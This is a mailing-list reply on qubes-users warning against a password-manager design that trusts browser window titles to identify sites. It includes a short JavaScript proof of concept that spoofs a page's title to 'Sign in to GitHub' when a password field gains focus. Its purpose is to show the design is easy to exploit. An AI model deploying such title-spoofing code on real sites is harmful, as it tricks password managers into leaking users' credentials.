On Thu, Mar 30, 2017 at 6:21 PM, Shane Optima <optima.sh...@gmail.com> wrote: > Maybe if you (or someone) could write a Firefox extension to modify all > browser page titles to be a concatenation of the page title and a short token > of characters generated from a salted hash of the URL (so that I don't have > to deal with any more hyperbole out of people like M. Ouelette), I could > write the Dom0 bash bit. Or vice versa. Couldn't promise delivery on a tight > deadline, though.
If you're going to write an extension then there's no reason to use window titles since you could communicate over another channel which is not under full attacker control by default, and wouldn't have negative UX side-effects of abusing window titles as a communication mechanism. Furthermore, it's not hyperbole. Here's a super simple (but likely quite effective!) exploit which took me a about two minutes to write: (function() { var attack_target = 'Sign in to GitHub ยท GitHub'; var saved_title = ''; var pw = document.querySelector('#password'); pw.addEventListener('focus', function() { saved_title = document.title; if (Math.random() < 0.2) document.title = attack_target; }); pw.addEventListener('blur', function() { document.title = saved_title; }); })(); What you are proposing is simply too dangerous and easy to exploit. For most threat models, passwords would honestly be safer if saved in the browser. For the safety of yourself and others, please don't implement this using window titles as proposed. Don't get me wrong, your fundamental concept is a good idea, but only if the password manager authenticates the requesting site in a secure way. Window titles are absolutely not the way to do that, not even for an initial version. -- You received this message because you are subscribed to the Google Groups "qubes-users" group. To unsubscribe from this group and stop receiving emails from it, send an email to qubes-users+unsubscr...@googlegroups.com. To post to this group, send email to qubes-users@googlegroups.com. To view this discussion on the web visit https://groups.google.com/d/msgid/qubes-users/CABQWM_An4gJZ%2BbY4i5j7j07iz9AVkp27JcCpxxjHGMDmD_kjcQ%40mail.gmail.com. For more options, visit https://groups.google.com/d/optout.